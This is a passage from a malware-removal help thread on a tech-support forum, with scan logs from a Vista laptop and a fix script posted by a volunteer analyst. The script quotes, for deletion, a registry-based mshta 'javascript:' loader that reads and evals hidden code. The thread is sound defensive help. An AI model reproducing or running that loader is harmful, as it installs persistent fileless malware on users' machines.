"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
Completion time: 2016-12-22 08:00:35
ComboFix-quarantined-files.txt 2016-12-22 16:00
.
Pre-Run: 47,633,354,752 bytes free
Post-Run: 49,161,199,616 bytes free
.
- - End Of File - - 480AB9E0932C50F4054489215A71EC1F
5B5E648D12FCADC244C1EC30318E1EB9
win98forever is offline  
Old 12-22-2016, 02:55 PM   #7
Security Team

Hello win98forever. You can choose to delete those detections in Security Essentials history if you wish.

Are you still unable to turn on real-time protection in Security Essentials?

------------------------------------------------------

Please download Farbar Recovery Scan Tool and save it to your desktop.
  • Double-click FRST64 to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • It also makes another log (Addition.txt). Please attach it to your reply.
------------------------------------------------------
chemist is offline  
Old 12-22-2016, 03:06 PM   #8
TSF Enthusiast

MSE Real Time Protection was on when I opened it from the security alert. I removed the item from MSE quarantine.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-12-2016
Ran by Me (administrator) on ME-PC (22-12-2016 15:02:30)
Running from C:\Users\Me\Desktop\stuff
Loaded Profiles: Me (Available Profiles: Me)
Platform: Windows Vista (TM) Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Windows\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\Toshiba\ConfigFree\NDSTray.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\Toshiba\ConfigFree\CFSwMgr.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [431968 2008-02-06] (TOSHIBA Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1573160 2008-08-14] (Synaptics, Inc.)
HKLM\...\Run: [SmoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-06-02] (TOSHIBA Corporation)
HKLM\...\Run: [Skytel] => C:\Windows\Skytel.exe [1826816 2007-11-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RAVCpl64.exe [6156288 2008-04-08] (Realtek Semiconductor)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1354712 2016-08-30] (Microsoft Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52560 2007-12-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [865280 2008-05-09] (TOSHIBA Corporation)
HKLM-x32\...\Run: [NDSTray.exe] => NDSTray.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2015-05-10]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.toshibadirect.com/dpdstart
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKLM -> {433BB3A7-874E-436B-BD51-239C6921FE98} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage};
SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000 -> {56B663A7-8091-4EF3-A706-11C321B76ABB} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-10-30] (Ghostery, Inc.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-19] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-19] (Oracle Corporation)
Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 [2016-12-22]
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> Bing
FF Homepage: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> about:home
FF NetworkProxy: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> type", 0
FF Extension: (Adblock Plus Pop-up Addon) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-04-27]
FF Extension: (Ghostery) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-11-29]
FF Extension: (Facebook™ Disconnect) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-09-06]
FF Extension: (Flagfox) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b}.xpi [2016-12-16]
FF Extension: (NoScript) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-11-29]
FF Extension: (Adblock Plus) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-23]
FF Extension: (BetterPrivacy) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{d40f5e7b-d2cf-4856-b441-cc613eeffbe3}.xpi [2016-10-31]
FF SearchPlugin: C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\searchplugins\yahoo-ysp.xml [2015-11-23]
FF ProfilePath: C:\Users\Me\AppData\Roaming\kompozer.net\KompoZer\Profiles\rx44r1ux.default [2015-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-05-10] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-19] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-19] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2008-04-03] (TOSHIBA Corporation.) [File not signed]
S4 ConfigFree Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe [40960 2008-04-16] (TOSHIBA CORPORATION) [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
S4 jswpsapi; C:\Program Files (x86)\Jumpstart\jswpsapi.exe [954368 2008-04-16] (Atheros Communications, Inc.) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [120888 2016-08-30] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-08-30] (Microsoft Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [3272656 2014-07-21] (Paramount Software UK Ltd)
S4 SmartFaceVWatchSrv; C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatchSrv.exe [84992 2008-04-24] (Toshiba) [File not signed]
S4 TNaviSrv; C:\Program Files (x86)\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2008-07-18] (TOSHIBA Corporation)
S4 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed]
S4 TOSHIBA SMART Log Service; C:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe [175104 2007-12-03] (TOSHIBA Corporation) [File not signed]
S4 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [49152 2006-08-23] (Ulead Systems, Inc.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
S3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [X]
S4 IAANTMON; C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2008-01-20] (Microsoft Corporation)
S1 Beep; no ImagePath
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 PSMounterEx; C:\Windows\system32\drivers\psmounterex.sys [169992 2015-04-02] (Windows (R) Win 7 DDK provider)
S3 PSVolAcc; C:\Windows\System32\Drivers\PSVolAcc.sys [12760 2014-07-21] (Paramount Software UK Ltd)
S3 WIMMount; C:\Program Files\Macrium\Reflect\wimmount.sys [22096 2015-05-14] (Microsoft Corporation)
S0 iaStor; system32\DRIVERS\iaStor.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-22 15:02 - 2016-12-22 15:02 - 00000000 ____D C:\FRST
2016-12-22 11:41 - 2016-12-22 15:02 - 00000000 ____D C:\Users\Me\Desktop\stuff
2016-12-22 08:00 - 2016-12-22 08:00 - 00006778 _____ C:\ComboFix.txt
2016-12-22 07:46 - 2016-12-22 08:00 - 00000000 ____D C:\Qoobox
2016-12-22 07:46 - 2011-06-25 22:45 - 00256000 _____ C:\Windows\PEV.exe
2016-12-22 07:46 - 2010-11-07 09:20 - 00208896 _____ C:\Windows\MBR.exe
2016-12-22 07:46 - 2009-04-19 20:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00098816 _____ C:\Windows\sed.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00080412 _____ C:\Windows\grep.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00068096 _____ C:\Windows\zip.exe
2016-12-22 07:45 - 2016-12-22 07:58 - 00000000 ____D C:\Windows\erdnt
2016-12-22 07:25 - 2016-12-22 07:25 - 05659917 ____R (Swearware) C:\Users\Me\Desktop\ComboFix.exe
2016-12-20 11:30 - 2016-12-20 11:48 - 00000000 ____D C:\Users\Me\Desktop\house pics
2016-12-18 15:52 - 2016-12-18 15:52 - 00000000 ____D C:\Windows\CheckSur
2016-12-18 12:16 - 2016-12-18 12:16 - 00000000 ____D C:\65c7b20dc424bda6bd39db516b4d
2016-12-18 09:45 - 2016-12-18 09:45 - 00000000 ____D C:\2b654b41d190c0d9a397eb33
2016-11-24 14:24 - 2016-10-25 15:10 - 02804736 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-11-24 14:19 - 2016-11-02 08:16 - 00383208 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-11-24 14:19 - 2016-11-02 08:09 - 00048128 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-11-24 14:19 - 2016-11-02 08:06 - 00306408 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-11-24 14:19 - 2016-11-02 07:59 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-11-24 14:05 - 2016-11-24 14:05 - 00000000 ____D C:\03a9f024af5b29727cd1e2a8
2016-11-24 13:37 - 2016-10-04 06:41 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-22 14:59 - 2016-11-18 12:30 - 00000000 ____D C:\Users\Me\AppData\LocalLow\Mozilla
2016-12-22 14:12 - 2006-11-02 05:33 - 00000000 ____D C:\Windows\inf
2016-12-22 14:04 - 2016-05-06 12:01 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-12-22 13:43 - 2006-11-02 07:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-12-22 13:43 - 2006-11-02 07:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-12-22 11:48 - 2006-11-02 04:46 - 00758370 _____ C:\Windows\system32\PerfStringBackup.INI
2016-12-22 11:43 - 2006-11-02 07:42 - 00032568 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-12-22 11:43 - 2006-11-02 07:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-12-22 11:43 - 2006-11-02 07:21 - 00409496 _____ C:\Windows\system32\FNTCACHE.DAT
2016-12-22 07:58 - 2006-11-02 04:34 - 00000215 _____ C:\Windows\system.ini
2016-12-22 07:37 - 2015-07-09 06:57 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-12-22 07:30 - 2015-07-07 06:28 - 00000000 ____D C:\AdwCleaner
2016-12-17 14:47 - 2015-05-10 06:56 - 00000000 ____D C:\Users\Me\AppData\Roaming\Macromedia
2016-12-17 10:26 - 2016-06-17 13:37 - 06858912 _____ (ESET spol. s r.o.) C:\Users\Me\Desktop\esetonlinescanner_enu.exe
2016-12-14 07:15 - 2015-05-10 07:22 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-13 11:04 - 2016-05-06 12:01 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-12-13 11:04 - 2016-05-06 12:01 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-12-13 11:04 - 2016-05-06 12:01 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-12-13 11:04 - 2015-05-10 10:30 - 00000000 ____D C:\Windows\system32\Macromed
2016-12-13 11:04 - 2008-08-18 10:23 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-12-13 08:32 - 2015-05-14 14:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-11 08:07 - 2015-07-10 09:12 - 00000000 ____D C:\Users\Me\AppData\LocalLow\Ghostery
2016-12-04 14:20 - 2015-05-10 06:56 - 00000000 ____D C:\Users\Me\AppData\Roaming\Intelli-studio
2016-11-23 19:29 - 2016-11-21 18:37 - 00025088 ____H C:\Users\Me\Desktop\~WRL3107.tmp

==================== Files in the root of some directories =======

2015-05-10 07:00 - 2012-03-25 08:43 - 0000680 _____ () C:\Users\Me\AppData\Local\d3d9caps.dat
2015-05-10 07:00 - 2016-09-10 13:49 - 0001460 _____ () C:\Users\Me\AppData\Local\d3d9caps64.dat
2015-05-10 07:00 - 2016-03-31 07:42 - 0010240 _____ () C:\Users\Me\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-10 07:00 - 2013-03-18 16:21 - 0386444 _____ () C:\Users\Me\AppData\Local\dd_vcredistMSI25C2.txt
2015-05-10 07:00 - 2013-03-18 16:21 - 0011374 _____ () C:\Users\Me\AppData\Local\dd_vcredistUI25C2.txt
2015-06-09 07:44 - 2016-11-23 09:56 - 0020468 _____ () C:\ProgramData\hpzinstall.log
2015-05-10 05:55 - 2015-05-10 05:55 - 0005115 _____ () C:\ProgramData\N360BUOptions.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-22 11:51

==================== End of FRST.txt ============================
Attached file: Addition.txt (27.6 KB)
win98forever is offline  
Old 12-22-2016, 09:27 PM   #9
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, win98forever.

------------------------------------------------------

Please download Farbar Service Scanner and run it on the computer with the issue.
  • Make sure the Internet Services option remains checked.
  • Check all the other boxes.
  • Click Scan.
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log in your next reply.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-23-2016, 08:28 AM   #10
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Good morning Chemist,

Farbar Service Scanner Version: 27-01-2016
Ran by Me (administrator) on 23-12-2016 at 08:25:30
Running from "C:\Users\Me\Desktop"
Microsoft® Windows Vista™ Home Premium Service Pack 2 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================


System Restore:
============

System Restore Policy:
========================


Security Center:
============


Windows Update:
============

Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.
The ImagePath of WinDefend service is OK.
The ServiceDll of WinDefend service is OK.


Windows Defender Disabled Policy:
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1


Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcsvc.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****
win98forever is offline  
Old 12-24-2016, 12:09 PM   #11
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, win98forever. Are you currently experiencing any problems with your machine?

------------------------------------------------------
  • Open Notepad (Start > All Programs > Accessories > Notepad).
  • Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
  • Save it as fixlist.txt next to FRST64.exe

    NOTE: Both FRST64.exe and the fixlist.txt must be in the same location or the fix will not work.


    Code:
    start
    createrestorepoint:
    Task: {1FF86DA0-1AF2-4032-88A4-F8882C4552AB} - \DriverDocRunAtStartup -> No File <==== ATTENTION
    Task: {597B495C-7D2A-4C09-9473-E34D0C324223} - \DriverDoc_UPDATES -> No File <==== ATTENTION
    HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Classes\13cb9: "C:\Windows\system32\mshta.exe" "javascript:e0ldi7ba="7Q";E0B1=new ActiveXObject("WScript.Shell");FZc9QGI6="JoO3na";AqP8o3=E0B1.RegRead("HKCU\\software\\lgduy\\ulqvtwy");WB97YbhTf="08QxfG";eval(AqP8o3);AOM8kr="h06uuXT";" <===== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    EmptyTemp:
    end
  • Double-click FRST64 to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
  • Click the Fix button just once, and wait.
  • If you receive a message that a reboot is required, please make sure you allow it to restart normally.
  • The tool will complete its run after the restart.
  • When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

------------------------------------------------------

Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2
  • Double-click SystemLook_x64.exe to run it. (Vista/Win7/Win8/Win10 users, right-click > Run as administrator)
  • Copy/paste the contents of the following codebox into the main textfield:
    Code:
    :reg
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Beep /s
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor /s
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\IpInIp /s
    
    :filefind
    beep.sys
